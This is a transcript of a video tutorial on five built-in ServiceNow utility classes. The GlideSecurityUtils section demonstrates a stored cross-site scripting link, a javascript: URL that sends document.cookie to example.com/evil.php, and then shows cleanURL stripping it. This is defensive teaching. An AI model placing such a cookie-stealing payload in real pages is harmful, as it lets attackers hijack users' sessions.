Hi, this is Kunal from Loop 91. How many times have you written a helper function in ServiceNow? Maybe a quick utility to check if a value is null or to generate a random token, only to realize later the ServiceNow already ships that exact function out of the box. Today, we are going to fix that. I'm going to walk you through 5 utility classes baked right into ServiceNow platform that every developer should have their back pocket. The 5 classes that we are going to cover today are GlideRecordUtil, GlideSecureRandomUtil, GlideSecurityUtils, JSUtil, and TaskStateUtil. I'll put a link to each of this class documentation in our description. All examples that we will discuss today are server-side scripts. You can drop straight them into a background script or a business rule. Some classes are scoped only, some are global only. I will call out that for each of the class. The first class that we're going to talk about is GlideRecordUtils. It is a global scope utility class. It provides static helpers for common glide record operations that you would otherwise write yourself every time. Remember what I said, this lives in global scope only. This is not available in scoped apps. You can create a wrapper and use it, but it is most useful in global business rules, script actions, and background scripts. I want to highlight a function from each class, and for this class, we would look at get fields. Now imagine you have a glide record object and you want to know what are the fields that are available on that table for this particular glide record object. So one way to do it would be to go and query the sys dictionary. Let's try that and then we'll start again and use this function. For our first example, we will look at incident table and try to collect name of the fields that are on this table. What we have done is that we are querying sys dictionary table. This table holds all the field definition for all the tables. Then we query asking that only show us fields from incident table. We collect the field names using a while loop, and then we gsinfo log that onto the log table. And we get that there are these many fields on this table, but this could be done very easily using our utils. Let's now change our code and do that. Now let's do it the util way. So we will comment out the previous code, and I've already written the new code and I'll show it to you. So what we do is we query the incident table that we would need to work upon. We will try to get to a single record because this function expects you to a glide record, which is pointing towards a record, and then simply GlideRecordUtils dot get fields and passing the incident glide record object as parameter, and what it gives back you is an array of all the fields. And you have it. This was the easy way. It is cleaner and you don't actually have to maintain it. The next class we're talking about is GlideSecureRandomUtil. Now if you focus on the name itself, it says GlideSecure, the keyword being secure. If I had a penny for every time I saw a developer implement their own random password generator, token generator, well, I would have few pounds, but that is even too much. You should never ever try to write a random token maker develop using this library. It is cryptographically secure random value generator. It is available both in scoped applications and global context. So you can use it anywhere that you want to use. So we will take example of generating a random string. Okay, so let's go to our background script. The syntax is very simple. Glide records random util dot get secure random string, and we pass the number of characters that we need, and that is 15. If we run it, it will give you a new string every time. Another thing that I want to highlight about this function is that what it generates is URL safe alphanumeric. That means it will not have the special character that can not be used in a URL. So you are safe using it for sending secret tokens through email or even the URLs. For the third class, we are going to talk about GlideSecurityUtils. It is a class that specifically gives you functions to clean up URLs. It allows you to strip dangerous schemes and enforce relative path to prevent open redirection and URL injection attacks. What I'll do is I will put in OWASP site links in the description. I want you to look at it, and if you're just starting out as a developer, you should be aware of how bad these attacks can get. Now for today, what we will look at a specific function in this class, and that is clean URL. This function removes suspicious encoding or JavaScript that is added to a URL. So let's quickly jump. I have created a service portal page and a widget on it. What it does, it looks at this particular incident 9009, and on it I have added a field which is called URL, and you can see that this is a malicious code. What it does, it will open a site in which is example.com/evil.php $cookie equals to document.cookie. So what it does is that it will pick up all the cookies that are available to JavaScript within your browser and send it across to this particular site. Now remember, I have used example.com. Example.com is a great way to show examples. This is owned by Mozilla, the makers of Firefox, and they have allowed people to use it just to show example domain. So even if you accidentally leak some data onto this site, you should be safe. Similarly, whenever you want to use example emails, always use example.com. Okay, so now coming back to our topic of clean URLs. So what I've done is this is a custom field that I've added, u_URL. So what you see on the screen is that we are literally using the values that we get from a database to show this link. I will only show you the server script of this widget. I don't want to show you how HTML or client script work, because that is where I made this injection actually work, and it will be counterintuitive. It will actually bad thing to show anyone how does that work. So what we're doing is simply we are copying URL as it is, without any escaping, without any cleaning up, and we will render that directly onto the page. Now if I were to click on this, if you see in the bottom left of our browser, you can see that it shows javascript:/window.open example.com/evil.php cookie equal to document.cookie. If I were to click on this, it will open a new page. Let's expand it, and if you see in the URL, it actually contains the whole cookie that our ServiceNow site has actually stored on our browser. Now if this were to happen, and if it were a evil site, if it were an hacking attempt, this will hand over your session and session cookies to this site, and they can take over your session and log in onto ServiceNow as if you have logged in. No password, nothing asked. So it is that bad. So how do you prevent this? Actually, very simple. So we use our class GlideSecurityUtils.cleanURL and put in that as parameter. So we will comment this line out and reload this page. Now if you look at the browser, it has removed the JavaScript part, and what it is doing is /null. So this is how you prevent JavaScript into URLs attack. The fourth class that I would like to talk about is JSUtils. JSUtil is a global scope JavaScript utility class with a collection of type checking object inspection helpers that ServiceNow developer constantly rewrite from scratch. I mean, this is one of those libraries that even experienced developers see and go, wait, that exists. It is a grab bag of useful static methods for type checking, null handling, and object inspection. Again, remember this is a global scope only, so use it only in global business rules and script includes. In this class, I want to show two functions. One is .nil and second is typeof. I believe these two are something that every developer should know and should be using on a regular basis. So quickly, let's look at our script here. So we have a glide record query. We are querying incident on it, and we are querying a particular SSID, and I can show you the record here. It is this record, and we are looking at if this record has an assigned to or not. So if I were to go and say gsinfo JSUtil.nil, this returns a Boolean value, and it will check whether this record dot this field value is nil or not. So if I were to run it, it will give us true. So what I'll do is I'll quickly assign it to someone, and let us see what happens after this. So we'll save this and quickly rerun the script, and suddenly this becomes false. Now for the second part, what we are looking at is type of. Right, remember I told you this is a Boolean. So what we'll do is we will copy this answer equals, and we'll copy this here, and then we will say JSUtil dot type of answer, and let us see what it shows. Boolean. To give you an example as how good this function is, what I'll do is I will return a few statements, and we will quickly try to paste that here. Let me copy it. I have written this code before, right? And let me remove the previous part. So what we are doing is that we will try to write 42 hello in a string, null, undefined, an array, and an object, and let us see how it refer. They return exactly what you expect from it. So if you are struggling with type matching or finding out whether the value is a string or an object or an integer, this is for you. The last class that I want to cover today is TaskStateUtil. This class provides for interrogating or managing the state field on task-based records, may it be incident, change, problems, or any other custom table that has been extended from task. This class is a hidden gem for anyone writing logic around incident or change states. Instead of hard coding state values in integers like state equals equal to 6, you can use human readable methods that are much more maintainable. Okay, so what we'll do is we will quickly jump to our background script, and I will show you what I have written. Right, so what is happening right now is that we will run a glide query on incident, get a particular record, and this is the record. Now if you see, the state is in progress, which means we expected this to be an active incident. So what we do is we invoke and we create an instance of this class TaskStateUtils. We have to pass the glide record as a parameter to this, and then we simply ask StateUtils dot is state inactive and pass the current state as parameter, and what it will give back is a Boolean value, and that we will log. So if I were to run this, it will say false. But if we were to close this, for example, if I want to close this, and if I were to close this and rerun the query now, rerun the code now, it says true. So now what has happened is I'm not checking for values of the state. I have a function that takes care for me. Although this is not part of the utils, but I want to show you how does this work. So if you were to open the dictionary of state and then open dictionary entry override, let me reopen that page. So right now where we are is the dictionary for state, and if I were to go to dictionary overrides and open incident here, you would find that there are some attributes here, and here is where we define which are the closed states, which is the default work state, which is default close state, and that's it. Here is what defines, and this is the attribute value that this function uses to decide whether this is a active incident or is it inactive.
Hi guys, this is Kunal again.
I really hope you're liking the videos that I make. And if you do, please like and subscribe. And if you're being generous, share it to others. Thanks for watching.